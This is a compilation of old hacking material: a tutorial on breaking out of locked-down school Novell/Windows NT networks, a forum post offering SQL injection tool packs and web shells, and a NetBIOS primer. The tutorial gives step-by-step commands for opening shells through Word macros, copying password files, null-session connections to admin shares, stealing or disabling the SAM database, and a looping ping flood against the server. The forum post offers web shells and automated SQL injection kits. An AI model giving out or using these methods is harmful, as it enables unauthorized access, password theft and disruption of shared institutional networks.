your depth real quick. Enough said. Always keep up with what's happening on the web, no matter
how much time you have to put into it.

Moving on. Now I would like to get some things straight about myself. Although I have made this
tutorial for people wishing to gain privileges in Novell, this tutorial isn't for everybody.
Although I like to think I'm a nice guy, there are certain people I dislike. These are the
people who always want you to do things for them. They never want to learn because they "can't
be bothered" so they always come to you for help. This tutorial is not for people who want the
easy way out. If the only reason you want to know how to do this is so you can impress your
friends, close this tutorial and click on its icon. Now press Shift+DEL. There we go. That
probably got rid of some of them. Anyway, this tutorial is being written for serious people who
have little or no knowledge of Novell simply because they haven't come across it. No problem.

Novell - What You Need To Know

Let's start off with the question "What is Novell?" Novell is basically a program that you
install over windows that works over a network to give users appropriate access. For example,
many schools use Novell because it allows them to give students limited rights so they can only
do what the admin allows them to (erhem). There is always at least one administrator to
supervise the network and manage student accounts.

Novell is a respected company that has been making security related programs for a long time.
Unfortunately, in recent years, Novell has been slipping up when it comes to the integrity of
their programs. Not surprisingly, many security holes have been found and many more are on their

The Basics of Novell Hacking

As with any hack, we must first decide on the objective ie what do we want to achieve? Well,
let's go through it. Since you have physical access to the network, chances are you use it quite
often. Therefore you probably wouldn't want to install a virus as you would only be doing
yourself a bad favour. In places like schools, it is very common for admins to restrict access
to the floppy or cd drives as they don't want people bringing in stuff like viruses, corrupt
files or even games. We will soon see how to access these files anyway. Maybe you want admin
rights? If the admin is stupid, even this is possible. Do you want to install a game? Do you
want to look at other users files? All these things and more are possible on some Novell
networks. What you have to understand as either a user or an admin is that networks will always
have flaws. I have classified Novell networks into three basic categories:

* shit security
* ok security
* perfect flawless security

In my experience, I have come across two of the above mentioned types of networks. Guess which
two. Note that many systems start off in the "shit security" category but move up into the "ok
security" category. When this happens, a hacker that had gotten used to a certain system may be
depressed for a while. Until he or she finds new holes. There is only so much an admin can
disable on your computer before it becomes a vegetable and of absolutely no use to anyone.
That's why we use whatever programs we have left to our advantage. If you are a student then you
will undoubtedly have programs that aid in study, such as Notepad, MS Word, you may have
Powerpoint etc. All these programs can be used to our advantage.

First of all, let me cover the "shit" network class. In this network class, you should be able
to do anything. If something you do comes up with the message "This operation has been cancelled
by the Administrator" or "You have insufficient rights to execute this command" or something to
that effect, then the network falls into the "ok" class. Anyway, if your network falls into the
"shit" class, you should be able to open Internet Explorer then go File > Open then Browse...
When you do this, you will be able to see the entire C: drive of the computer, though you may
not necessarily be able to open any of the files.

***Note: This tutorial assumes that the Desktop has been stripped of all icons and the start
menu is almost bare if not completely removed.

OK. Now that we can see the path of all the files, we click Browse... again and attempt to open
a file using IE. Pick a useful file like "" if you are using winnt. When you find the
file, click ok and you will have a little box with the full pathname of the file. You can either
OK, Cancel or Browse... Do none of these. Copy the pathname. Now open MS Word. Go to View > Toolbars
then go to Visual Basic. A toolbox will pop up. Click "Design Mode". A new toolbox should pop up
again. This time click the "Command Button" which just looks like a small rectangle. When the
button pops up, double click it. You should be taken to a VB screen with the following in the

Private Sub CommandButton1_Click()

End Sub

Now type in...
...and hit F5 (Debug), so your screen looks like

Private Sub CommandButton1_Click()
End Sub

Hopefully, a minimized command screen will come up. If it doesn't, try this:

Private Sub CommandButton1_Click()
a = SHELL("C:\winnt\system32\",vbNormalFocus)
End Sub

Hit F5 again. If this doesn't work there could be a number of things wrong. If a screen comes up
saying macros have been disabled, go back to your first Visual Basic toolbar. One of the buttons
says "Security...". Click it, then select the option that says "Low". Try again. If this was the
problem, you are lucky. If it still doesn't work, read on. If it says "Run-time error:'53'---
File not found" you are in trouble. It means you either fucked up the pathname or it isn't
there. Of course, if your computer is running win2k or xp you will have to slightly adjust your
pathname to the one above.

***Note: I recommend you use as opposed to cmd.exe. The main reason is that cmd.exe
can be blocked off by your administrator, so as soon as you open it you will get something that
says "CMD has been restricted by your administrator. Press any key to continue...". If this
happens, cmd is useless.

Now we move on to Powerpoint. This is a very simple way of opening files. You create any slide,
then right click and go "Hyperlink" or whatever it says. From there you are able to link it to
any file on the computer. When you view the slide show, click on the hyperlink and you will open
the file.

Now we move on to Notepad. Notepad is one of those things that I would kill for. It is just so
versatile that it can be used for anything and everybody has it, so there are never any problems
with compatibility. That's part of the reason most tutorials, including this one, are written in
Notepad. The way we will use Notepad in this example is by creating a hyperlink to a document,
much like what we did with Powerpoint. So we open Notepad then type:


We then go to File > Save as... then we type in "link.html" in our private drive (the drive the
admin has allocated to each user for storage of personal files, sometimes also called My
Documents). When we refresh the drive, we should be able to see an IE icon called "link.html".
Double click it, then click the hyperlink. Hope it works!

Now we will try creating shortcuts. This is probably the easiest method to use to get into DOS
(strictly speaking this is not true DOS, but for the purpose of this tutorial I will refer to it as such).
That's the reason I saved it for last. The earlier methods allow you to fish around inside the
network and get to know how it works, what makes it tick. Not to mention that the previous
methods were not limited to accessing command, but allowed us to open ANYTHING. Now let's take a
look at how shortcuts work. Open your local drive, then right click and go to New > Shortcut
(if you have right click disabled go to File > New > Shortcut). In the space provided type
"command" and hit next. Now click finish. You should have a shortcut placed on your drive that
takes you to DOS.

Now let's take a look at QBasic. QBasic is a primitive sequential programming language used to
create really crappy programs. Luckily, most schools have QBasic in their syllabus, so you
should have the icon. If you do, you are lucky. Open QBasic, then when you get to the main
screen, type...


...and Hit F5

This will immediately open up DOS for you. Cool huh? So, what can we do with DOS? If you need to
be asking that question then you shouldn't be reading this tutorial, but briefly I will tell you
that DOS is very helpful when accessing anything, whether it be on a hard drive, floppy, cd or
anywhere else.

Speaking of floppy, you may be wondering how to access it or cds on a network that appears to be
completely locked down. There are a couple of ways. First of all, if you can see any drives as
icons, try right clicking on them. You might have an option that says "Map Network Drive" and
"Disconnect Network Drive". If this is the case, find out which one is the floppy drive (try a:
or b: first) and disconnect it. Now, in the address bar in any window, type "a:" and you should
be taken to the floppy.

If this doesn't work, then don't worry. Heaps of things definitely will. Of course it depends
greatly on the network, but generally the principle is the same. In a network where you don't
have the luxury of being able to freely browse everything, you have to be shifty. In your
private drive, try creating a shortcut to a:. This will almost definitely not work but is worth
a try. Also, try going to File > Winzip > Zip to file. This will allow you to transfer files
to your floppy.

Lastly, we can use DOS. This is my favourite method because it's hell hard to disable shit in
DOS, at least, effectively, so there aren't heaps of ways around it. In DOS type:


Volume in A has no label
Volume Serial Number is 0001-0AA0
Directory of A:

111,111 1/1/04
111,111 1/1/04


So now we can see what's on the disk. If you wanna run it you can type:


However, a more efficient way of opening it would be to first copy it to your private drive. We
do this by typing:

A:\>copy a:\*.zip h:

Assuming h: is your private drive. The wildcard will copy all files with the extension ".zip".
The same way, we can open cds. Exactly the same. Sometimes when we copy it to our drives we get
the message that "This operation has been cancelled by your administrator". In this case, we go
back to MS Word and open a VB macro. Type in the path and you open it. No questions asked and no
crappy prompts. By the way, you can also use a macro to open files directly from the floppy or
cd. I just prefer not to. I think it's easier to just copy them directly. Also you don't have to
check the pathname every time you want to open a new file. But whatever. Do what you feel
comfortable with. There is another way of getting access to the a: drive using the "net use"
command, but more about that later.

Another extremely useful thing you can do with DOS access is type something like:

C:\>copy c:\winnt\*.pwl a:

This command copies all the .pwl (password) files that are stored in the winnt directory. We can
now take the disk home and crack the password files in our own time at our own leisure. This
only works on crappy networks though. Most reasonably secure or just new networks no longer
store their passwords in .pwl files. In win2k, there's a new thing called SAM (Security Accounts
Manager). This is much harder to break, so more on that later.

Now for a quick lesson on network file sharing. In some networks, the admin allows you access to
all drives. If this is the case, there should be a drive which contains the files of all people
who have access to the network. Once you find the drive, simply scroll down to the folder with
the same name as the targets login name and you can browse their personal files. It should be
noted, however, that this kind of file sharing is only allowed on the shittiest of crappy
networks. I have come across it only once in my life =)

Now let's move on to something that may seem obvious, yet many people don't even consider.
Downloading off the web. As an admin, it is really very simple to turn off downloads. However,
you would be surprised how many admins forget about it and leave the web open to all their users
for all intents and purposes. I think the usefulness of being able to download files off the
internet is quite obvious, so I won't go on for long. In case you have absolutely no
imagination, the internet could be used for downloading backdoor programs, viruses (again,
what's the point?), password crackers or even just simple things like DOS =)

On a slightly different topic, DOS has many features that the common happy internet user doesn't
know, or doesn't need to know about. The most interesting one of these is Netstat. Netstat is a
time honoured command that allows the user to see all the inbound and outbound connections his
computer is engaged in. Netstat has many uses, but we will only quickly look at the most useful.
For the common internet user, Netstat can be used to find out, for example, whether or not they
have a trojan installed on their computer. For example, if they type in Netstat and see that
some computer has established a connection with them on a high numbered port such as 12345, they
know they're in trouble. Although by this time it may be too late, the person could then
terminate his internet connection and run down to the store to buy the latest anti-virus. Just
an example. For people who have malicious intentions, Netstat is an invaluable tool for quickly
and easily finding out someone's IP address or hostname. The trick is to send them a file and
execute the command. This file can be sent using anything; IRC, MSN etc.

***Note: Netstat usually shows only the hostname of the target. For an actual IP, type
Netstat -n.
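As an added example (not from the tutorial), here is a small Python parser for Windows `netstat -an` output that applies the check described above from the defender's side: it flags ESTABLISHED TCP sessions to a local LISTENING port that is not on an allow-list of expected services. The sample output and the allow-list of ports 135, 139 and 445 are constructed assumptions.

```python
"""Flag suspicious inbound connections in Windows ``netstat -an`` output.

Added example for this tutorial, not part of the original text. The idea
from the text: a connection ESTABLISHED to your machine on a high-numbered
port (the example given is 12345) that no known service should be using is
a red flag. Netstat does not tell you which program owns the port, so treat
a hit as something to investigate, not as proof of a trojan.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# Ports a typical Windows workstation of that era legitimately listened on.
# This allow-list is an assumption for the example; tune it to your own build.
EXPECTED_LISTEN_PORTS: Set[int] = {135, 139, 445}

# Constructed sample output in the layout of ``netstat -an`` on Windows.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    192.168.1.10:139       0.0.0.0:0              LISTENING
  TCP    192.168.1.10:1041      198.51.100.7:80        ESTABLISHED
  TCP    192.168.1.10:12345     203.0.113.5:1063       ESTABLISHED
  TCP    192.168.1.10:139       192.168.1.2:1027       ESTABLISHED
  UDP    0.0.0.0:137            *:*
"""

# One netstat row: protocol, local endpoint, foreign endpoint, optional state.
LINE_RE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<local>\S+)\s+(?P<foreign>\S+)"
    r"(?:\s+(?P<state>\S+))?\s*$"
)


@dataclass(frozen=True)
class Conn:
    proto: str
    local_host: str
    local_port: Optional[int]
    foreign_host: str
    foreign_port: Optional[int]  # None for the UDP "*:*" placeholder
    state: str


def _split_endpoint(endpoint: str):
    """Split 'host:port' into (host, port); a '*' port becomes None."""
    host, _, port = endpoint.rpartition(":")
    return host, (None if port == "*" else int(port))


def parse_netstat(text: str) -> List[Conn]:
    """Parse netstat -an text; header, banner and blank lines are skipped."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        lh, lp = _split_endpoint(m.group("local"))
        fh, fp = _split_endpoint(m.group("foreign"))
        conns.append(Conn(m.group("proto"), lh, lp, fh, fp, m.group("state") or ""))
    return conns


def suspicious_inbound(conns: List[Conn], expected: Set[int] = EXPECTED_LISTEN_PORTS) -> List[Conn]:
    """Return ESTABLISHED TCP sessions whose local port is one we are LISTENING
    on but which is not in the allow-list: someone connected *to* us on an
    unexpected service port, which is the situation the tutorial describes.
    An outbound session (local port is an ephemeral client port) is not flagged."""
    listening = {c.local_port for c in conns
                 if c.proto == "TCP" and c.state == "LISTENING"}
    return [c for c in conns
            if c.proto == "TCP" and c.state == "ESTABLISHED"
            and c.local_port in listening
            and c.local_port not in expected]


if __name__ == "__main__":
    for hit in suspicious_inbound(parse_netstat(SAMPLE_NETSTAT)):
        print(f"inbound session on local port {hit.local_port} from "
              f"{hit.foreign_host}:{hit.foreign_port} -- investigate")
```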

At this point, you may be wondering why I'm wasting time in showing off my DOS skills. The
reason is that if you're connected to a network, Netstat can show you the IP of the server ie
the "big daddy" computer which runs and maintains the network. In theory, if you wanted to and
you knew the IP of the server, you could create a DoS (Denial of Service) attack on the server.
In the old days this could be achieved by pinging the server with large packets in an infinite loop.
You might be less lucky these days... but hey, it's worth a shot.

Something really cool with DOS is that you can create batch files that execute commands in DOS.
Batch files are basically little programs that you can get to fire off commands. For example, I
can create a batch file that pings the server until I turn off the file. I can, of course, use
all the same commands that I could in an actual DOS window. Thus I can specify how many packets
I send, the timeout, packet size etc.

Creating batch files is incredibly simple. Open up Notepad, then type:

ping -t -l 1000 [This is the command you want to run]
ping.bat [Creates a loop to repeat command forever]

Now save this file as ping.bat, or anything you want it to be called but make sure you change
the filename at the bottom of the bat file to ensure a loop. The cool thing about this is that
it doesn't wait for the command to be completed. It immediately starts the next command
regardless of the result of the previous one. This method can, of course, be used to execute any
command, and the loop can be stopped by removing the "ping.bat" at the end of the file. If you
wanna have some fun, try typing in "net send [username] [message]" in the command prompt. If the
user is currently logged on, a message will appear on his screen. It's really funny if you can
see their monitor from where you are sitting if you type a crazy message like "You have just
been owned!!!". Be aware however that the person receiving the message will know what computer
the message has come from. Your computer name will be something crazy like LIB00123. Although
the user may not be able to tell exactly who sent the message (then again, if he's smart he
will), he can type in the computer name instead of the username and create a .bat file to spam
you to hell.

Let's get back on track. It's time to show you how to create admin accounts in Novell if the OS
is winnt, assuming the Control Panel is disabled. Note however that this is easy to disable, but
most admins forget about it. Go into any folder and go to the Help menu, then Help Topics.
Search anything related to users, passwords etc. You will then find a topic that contains a hyperlink
to "Users and Passwords". Click it. The crappy thing about winnt security is that when changing
a password, you don't have to know the old one! Anyway, once you either create a new account
or change the password on an existing account, restart the computer. When the logon screen
appears, type your login name and password. Now look around for a checkbox that says
"Workstation". Check it and press OK.

***Note: you will only have admin access on that particular computer. "Workstation" means that
you log onto an account on that workstation. If the checkbox isn't on the login screen, then you
cannot create admin accounts in this way. You will have to try certain programs described later
in the "Advanced Novell Hacking" section.

Lastly, I will show you how to access telnet. As you may have seen, most of my methods involve
DOS. Telnet is no different. In a DOS screen, type "telnet" and you will be taken to the Telnet
screen. From here try telnetting to the server and punch in a few commands to see what you can
do. Find out as much info as you can about what programs he's using and go online to look for
some tutorials.

Advanced Novell Hacking

This short section will discuss various advanced Novell hacking techniques. These involve using
programs such as port scanners, keyloggers, trojans and password crackers. I will also be looking
at File and Print Sharing (Legion V2.1, Sid2User - User2Sid, DumpSec), as well as some tips and
tricks with navigating around the network, including the "net use" command.

Firstly, let's look at various methods of hacking the network using specific programs. Although
this section may offend some people, it is nevertheless an essential part of Novell security. It
is an unfortunate fact that many people these days want to hack someone to be "cool" in the eyes
of their friends. These people have little or no morals, and almost always possess absolutely no
skill what so ever. All they care about is getting what they want, and they don't care how they
get it. Because of their lack of skill, these people usually rely solely on programs to do their
dirty work (if they don't have a friend who does it for them). If anybody like this is reading
this, I spit on you.

On the other hand, there are many skilled hackers out there who also turn to programs which
automate the process for a variety of reasons, usually because it is easier and usually more
effective to use programs.

As with any hack, there is one tool that you simply cannot live without. A port scanner. There
has been much debate over which port scanner is the best, what the pro's and con's of each
scanner are etc. Many say Nmap, but I often find there's no need to waste time with such an advanced
scanner. The problem with Nmap is that it is too complicated for quick and easy use. Nmap is
good for home use, when you have a lot of time on your hands to try out various scans. In my
humble opinion, the best scanner for a Novell network is Angry IP Scanner by Angryziber
( Angry IP allows for lightning fast port scans on huge networks,
with great accuracy. It has some built in features like being able to establish connections over
HTTP, FTP and Telnet, as well as being able to Traceroute. It also has cool things like
"favourites" and being able to tell you many things about the target, such as Hostname, Comp.
Name, Group Name, User Name, MAC address and TTL. On top of all this, it can be used from the
command line! Anyway, it has many more features that you need to explore yourself. For now, all
we really need to be focussing on is its efficient simple port scanning features.

First of all, you will need to get the IP of some computers on your network. If you have been
reading this tutorial carefully instead of just skipping to this section, you will remember that this
can be done using the netstat command in DOS (btw, if you still can't get DOS then you are really
dumb - no offence). You really only need one IP, because most, if not all of the IP's on the
network will have the same Network Number and Host Number. So, if you can see that your IP is, you should only scan IP's that have the same Network Number and Host Number. In
the case of the example, you would enter the start IP as and the end IP as First you should scan using only one port because you want to know exactly how
many computers you are potentially dealing with. If you put too many ports, you will be waiting
ages for your results if there are heaps of computers on the network. An alternative to this
would be to use the "net view" command.

C:\>net view

This displays all the computers connected to the network that you are currently on. This command
can be used to get further information about an individual machine by typing:

C:\>net view \\SOMECOMPUTER
Disk | share name

C:\>net view \\workgroup:TARGETWG (gives all computers in workgroup)
C:\>net view \\domain:TARGETD (gives all computers in domain)

Anyway, it would be best to specify the port as TCP 139, which you should all know as NetBIOS.
If this is open on any computers (and it damn well should be, you are on a network), you may be
able to get access to that computers hard drive. Go into DOS, and type in:

C:\>net use \\ADMINCOMPUTER\IPC$ "" /u:""

If you have even the slightest experience in hacking, you would have seen this command a
thousand times before. For those who haven't, all you are doing is attempting to connect to computer
"ADMINCOMPUTER" using the inbuilt IPC$ share with a null password "" and an anonymous user
/u:"". If this doesn't work, you can try substituting the password for a wildcard * or even the
account, so you can have:


They all do the same thing, but sometimes only certain ones will work on certain machines. If
you are unlucky, you could try to substitute the IPC$ for ADMIN$ or C$. These are just
additional default shares. The difference between ADMIN$, C$ and IPC$ is that IPC$ cannot be
removed. This means that you should always be able to establish a connection. Of course, the
admin may want to create additional shares such as such as A$ (remote floppy drive), E$ (remote
CD drive) and really anything he wants. An admin can quite easily create and delete shares using
the "net share" command:

C:\>net share ADMIN$ /delete
Command completed successfully

This command deletes the remote administrator ADMIN$ share. Shares can be added by typing:

C:\>net share A$ a:
Command completed successfully.

This tells the computer to create a share A$ with the target to the a: drive.

I said earlier that it is possible to disconnect the a: drive from the network, thus enabling it
for our own usage. This can be done using the command:

C:\>net use a: /delete

Unfortunately, this command can be restricted by the administrator. Once it is, no command with
the prefix "net" will work. On the bright side, it is rare for an admin to realise that anybody
has been fucking with net use commands and establishing connections, let alone disable the
command. If the command does get disabled, we are forced to turn to programs to do our dirty

Although there are a number of Netbios scanners, most of them are rather dated as these days few
hackers seriously rely on Netbios as their main weapon. Sure, it can be fun and rewarding, but
most computers these days have patches to guard against unauthorised access, or simply block
access to TCP 139 through their firewall or router. As a result, most people have stopped making
new Netbios programs. Because of this, most of the programs for Netbios are old. REALLY old.
We're talking old as in 1999 old. Sure, doesn't seem like that long ago, but in the computer
world, that is an eternity. Luckily for us, this is slightly different for networks. Because a
network has to be tied together very closely, it usually depends on port 139 to handle all the
traffic. As a result, most old programs will work like a charm. Although there are many, many
different programs you can use to try and get the shares, I recommend you use Legion V2.1 from
the now dead Rhino9 Security Group. It generally floats among internet sites.

Now let's take a quick look at the Security Accounts Manager (SAM). SAM is a way of storing
users details on the computer. It has usernames and password hashes inside, so it is very
important to keep safe from prying eyes. If you're the one with those eyes, SAM may just be your
goal. To cut the long story short, SAM cannot be accessed while anyone is logged onto that
computer. So what you have to do is restart it in DOS and try and copy it from there onto
floppy. The only problem with this is that sometimes SAM can be very big - a couple of Mb even -
so a floppy disk is an unlikely alternative. If the computer doesn't have a burner then it is
unlikely that you will be able to extract the hashes, so try and make the best of it any way you
can. Sometimes it's even possible to rename the SAM file by restarting in DOS and typing:

ren C:\winnt\repair\sam wateva

This will make the SAM file unreadable, so if the passwords are stored on the computer rather
than the server, they will all be useless. If this works, you will be able to log on without a
username or password. If you are able to extract the SAM file, there are many different password
crackers that you can use to take a peek at what's inside. L0pht, Cain and Abel and many more
do a splendid job. Try them out and see what works for you.

Finally, I'll just show you one last thing that will freak the hell out of your admin if he ever
sees it. It is ridiculously easy to access the server on most networks and nobody even considers
this method. Simply create a shortcut to it!!! If you can find a way to find the hostname of
your server, all you have to do it right click, select new then click on shortcut. In the space
provided, type the hostname of the server. For example, if the server is called "server-1" then
in the shortcut type:


Then click next and that's it! You can double click on the shortcut and you will have access to
all the files on the server!!! As I said before, this will scare the hell out of any admin
because he wouldn't have thought of it himself and has definitely not seen this before.
As for how much you can actually do - that depends entirely on the server. Most times
you will just browse but sometimes, who knows?

Lastly, we will take a quick look at the SUBST command. The SUBST command associates
a path with a drive letter. This means it creates a virtual drive on top of an actual one. This can
be extremely handy when the administrator has blocked off, say, the C: drive from being viewed.
Often the admin simply restricts access to the C: drive by not showing the icon for the drive. If this
is the case, simply open up a command prompt and type:

explorer c:

This will open explorer to the C: drive. Generally one will not be so lucky. The C: drive itself is
often restricted and trying to open explorer through command will tell us we don't have permission.
SUBST allows us to get past this. Open up a command prompt and type in:

subst z: C:\

where z: is the virtual drive you wish to create and C:\ is the path of the drive you wish to view.
Now all you have to do is type...

explorer z:

...and an explorer window will pop up showing you the contents of C: but in the z: drive. You may
navigate this at will just as you would normally on an unrestricted computer. Although
useful, SUBST really only gives you a graphical interface, since we may view the entire contents of a
drive through command anyway.

***Note: SUBST will also add the virtual drive to My Computer. If you have access to My Computer
you will see z: as well.

If you are having trouble with command because you cannot scroll up
whilst trying to use dir, try using dir /w or /p instead. Otherwise...

dir >> H:\dir.txt

...will send the results of the dir to a file called dir.txt (or will create the file if it does not already
exist) on the H: drive. Also note that on large networks net view can also be a pain, but using

net view >> H:\net.txt

we can see all the computers in a text file!



Hello everybody ,

Since I started learning SQLi, I have collected lots of good tools and documents. I'm still collecting more and more day by day as my scope of knowledge is increasing.
So I thought of sharing what I have collected till now with everyone here.
My tool pack includes the following things.


MD5 tools pack:


1) SQLi scanner/automating injection pack:
Contains 5 programs for scanning and automating the hacking process.

(a) Exploit scanner - for finding websites with dorks and testing them for vulnerabilities. Very famous.
(b) Turkish ARTA - same as Exploit scanner but not as famous because it's Turkish. I find it better than Exploit scanner, but that's my personal opinion.
(c) Havij 1.12 free version: I guess everyone knows about it. It automates the process of performing an SQLi attack on any site.
It is extremely famous and efficient, but still it's a tool :) nothing compared to the manual process.
(d) SQLI helper 2.7: same as Havij, but a little faster.
(e) sqlinj Version 2 - another nice SQL injection tool. I will write a tut later on how to use this tool.

2) ADMIN Finder pack:
After getting the logins from the database, one needs to get the admin finder page. For some sites it's very easy while for some sites it's hellova tough.
Here are some nice admin finder tools and lists that you may use, but these tools are never enough. I will keep uploading the admin finder lists as I get more.

(a) reiiuke admin finder (you can update the original admin finder lists with the list I am providing)
(b) 5 Perl and Python admin finder tools/scripts. Update them as per your need.
(c) misc software: admin pass locater, to brute force the admin pass if you can't find it.


3) DORKS pack: Contains many files containing more than 7000 dorks.

4) Shells: this pack contains many shells and source codes, like c99, c100, jackel and hellova more.
(Many shells like c99 are identified as trojans by many antivirus programs, so you might find your antivirus shouting about this pack.)
You might also wanna see this site:

5) MD5 cracking tools: although Havij has an MD5 tool, for some reason it never worked for me, so this pack contains some tools.

6) SQLi tutorials pack: This pack contains complete HTML pages of SQLi tutorials that I found useful from various forums and websites like hackforum, elitesoft, warex, outlaws etc. I bet every newbie will love this pack.
You just need a Firefox browser to open these HTML files.
NOTE: this pack also contains 2 of my own SQLi help files which I created myself; they serve me as a very useful document whenever I'm on to hack some site.

I will keep updating these packs as I learn and collect more and more.


Preface to NetBIOS

Before you begin reading this section, understand that this section was written for the novice to the concept of NetBIOS, but - it also contains information the veteran might find educational. I am prefacing this so that I do not get e-mail like "Why did you start your NetBIOS section off so basic?" - Simple, it's written for people that may be coming from an environment that does not use NetBIOS, so they would need me to start with basics, thanks.

What is NetBIOS?

NetBIOS (Network Basic Input/Output System) was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Since its creation, NetBIOS has become the basis for many other networking applications. In its strictest sense, NetBIOS is an interface specification for accessing networking services.

NetBIOS, a layer of software developed to link a network operating system with specific hardware, was originally designed as THE network controller for IBM's Network LAN. NetBIOS has now been extended to allow programs written using the NetBIOS interface to operate on the IBM token ring architecture. NetBIOS has since been adopted as an industry standard and now, it is common to refer to NetBIOS-compatible LANs.

It offers network applications a set of "hooks" to carry out inter-application communication and data transfer. In a basic sense, NetBIOS allows applications to talk to the network. Its intention is to isolate application programs from any type of hardware dependencies. It also spares software developers the task of developing network error recovery and low level message addressing or routing. The use of the NetBIOS interface does a lot of this work for them.

NetBIOS standardizes the interface between applications and a LANs operating capabilities. With this, it can be specified to which levels of the OSI model the application can write to, making the application transportable to other networks. In a NetBIOS LAN environment, computers are known on the system by a name. Each computer on the network has a permanent name that is programmed in various different ways. These names will be discussed in more detail below.

PC's on a NetBIOS LAN communicate either by establishing a session or by using NetBIOS datagram or broadcast methods. Sessions allow for a larger message to be sent and handle error detection and correction. The communication is on a one-to-one basis. Datagram and broadcast methods allow one computer to communicate with several other computers at the same time, but are limited in message size. There is no error detection or correction using these datagram or broadcast methods. However, datagram communication allows for communication without having to establish a session.

All communication in these environments is presented to NetBIOS in a format called Network Control Blocks (NCB). The allocation of these blocks in memory is dependent on the user program. These NCBs are divided into fields that are reserved for input and output respectively.

NetBIOS is a very common protocol used in todays environments. NetBIOS is supported on Ethernet, TokenRing, and IBM PC Networks. In its original induction, it was defined as only an interface between the application and the network adapter. Since then, transport like functions have been added to NetBIOS, making it more functional over time.

In NetBIOS, connection (TCP) oriented and connectionless (UDP) communication are both supported. It supports both broadcasts and multicasting and supports three distinct services: Naming, Session, and Datagram.

NetBIOS Names

NetBIOS names are used to identify resources on a network. Applications use these names to start and end sessions. You can configure a single machine with multiple applications, each of which has a unique NetBIOS name. Each PC that supports an application also has a NetBIOS station name that is user defined or that NetBIOS derives by internal means.

NetBIOS names can consist of up to 16 alphanumeric characters. The combination of characters must be unique within the entire source routing network. Before a PC that uses NetBIOS can fully function on a network, that PC must register its NetBIOS name.

When a client becomes active, the client advertises its name. A client is considered to be registered when it can successfully advertise itself without any other client claiming it has the same name. The steps of the registration process are as follows:

1. Upon boot up, the client broadcasts itself and its NetBIOS information anywhere from 6 to 10 times to ensure every other client on the network receives the information.

2. If another client on the network already has the name, that NetBIOS client issues its own broadcast to indicate that the name is in use. The client that is trying to register the already-in-use name stops all attempts to register that name.

3. If no other client on the network objects to the name registration, the client will finish the registration process.

There are two types of names in a NetBIOS environment: Unique and Group. A unique name must be unique across the network. A group name does not have to be unique, and all processes that have a given group name belong to the group. Each NetBIOS node maintains a table of all names currently owned by that node.
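The registration procedure and the unique/group distinction above can be modelled in a few lines. The following is an added example and not code from the original page: a toy broadcast segment where each node keeps its own name table, registering a name broadcasts it a fixed number of times, and an existing owner objects only when the rule above is violated (a unique name clashes with any existing owner; a group name clashes only with a unique owner). Node labels, the 6-attempt count and the log strings are constructed; the real NBT packet formats are not emitted.

```python
"""Toy model of NetBIOS name registration on a broadcast LAN.

Added example, not from the original page. Nodes, the attempt count (the
page says 6 to 10 broadcasts; 6 is assumed here) and the log strings are
constructed for illustration. Real NBT registration uses NAME REGISTRATION
REQUEST / NEGATIVE NAME REGISTRATION RESPONSE packets over UDP/137; this
model only reproduces the decision logic, not the wire format.
"""
from dataclasses import dataclass, field

UNIQUE = "U"
GROUP = "G"


@dataclass
class Node:
    """One NetBIOS node with its table of owned names: name -> type."""
    station: str
    names: dict = field(default_factory=dict)

    def objects_to(self, name: str, ntype: str) -> bool:
        """Step 2: does this node have to answer 'name in use'?

        A group name may be held by many nodes, so group-vs-group never
        conflicts. Any other combination with an existing owner does.
        """
        owned = self.names.get(name)
        if owned is None:
            return False
        return owned == UNIQUE or ntype == UNIQUE


class Lan:
    """Broadcast segment: every node hears every registration broadcast."""

    def __init__(self, nodes, attempts: int = 6):
        self.nodes = {n.station: n for n in nodes}
        self.attempts = attempts
        self.log = []

    def register(self, station: str, name: str, ntype: str) -> bool:
        """Run steps 1-3 for one node; True if the name is now owned."""
        node = self.nodes[station]
        for attempt in range(1, self.attempts + 1):
            # Step 1: broadcast the name (repeated so every node hears it).
            self.log.append(f"{station}: REGISTER {name}<{ntype}> attempt {attempt}")
            objectors = [
                other.station for other in self.nodes.values()
                if other is not node and other.objects_to(name, ntype)
            ]
            if objectors:
                # Step 2: an owner answers; the registrant gives up the name.
                self.log.append(f"{objectors[0]}: NAME IN USE {name} -> {station} stops")
                return False
        # Step 3: no objection during any broadcast; the name is owned.
        node.names[name] = ntype
        self.log.append(f"{station}: REGISTERED {name}<{ntype}>")
        return True


def demo():
    """Constructed scenario: one unique clash, shared group name, group/unique clash."""
    lan = Lan([Node("A"), Node("B"), Node("C")])
    results = {
        "A unique STUDENT1": lan.register("A", "STUDENT1", UNIQUE),  # owned by A
        "B unique STUDENT1": lan.register("B", "STUDENT1", UNIQUE),  # A objects
        "B group DOMAIN1": lan.register("B", "DOMAIN1", GROUP),      # owned by B
        "C group DOMAIN1": lan.register("C", "DOMAIN1", GROUP),      # groups can be shared
        "C unique DOMAIN1": lan.register("C", "DOMAIN1", UNIQUE),    # B objects
    }
    return results, lan


if __name__ == "__main__":
    results, lan = demo()
    print("\n".join(lan.log))
    print(results)
```

The `lan.log` list is the message trace; reading it next to the three numbered steps shows which broadcast drew the objection and which registrations completed silently.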

The NetBIOS naming convention allows for 16 characters in a NetBIOS name. Microsoft, however, limits these names to 15 characters and uses the 16th character as a NetBIOS suffix. A NetBIOS suffix is used by Microsoft Networking software to identify the functionality installed or the registered device or service.

[QuickNote: SMB and NBT (NetBIOS over TCP/IP) work very closely together and both use ports 137, 138, 139. Port 137 is NetBIOS name (UDP). Port 138 is NetBIOS datagram (UDP). Port 139 is NetBIOS session (TCP). For further information on NetBIOS, read the paper at the rhino9 website listed above.]

The following is a table of NetBIOS suffixes currently used by Microsoft Windows NT. These suffixes are displayed in hexadecimal format.

Name                  Number  Type  Usage
<computername>        00      U     Workstation Service
<computername>        01      U     Messenger Service
<\\--__MSBROWSE__>    01      G     Master Browser
<computername>        03      U     Messenger Service
<computername>        06      U     RAS Server Service
<computername>        1F      U     NetDDE Service
<computername>        20      U     File Server Service
<computername>        21      U     RAS Client Service
<computername>        22      U     Exchange Interchange
<computername>        23      U     Exchange Store
<computername>        24      U     Exchange Directory
<computername>        30      U     Modem Sharing Server Service
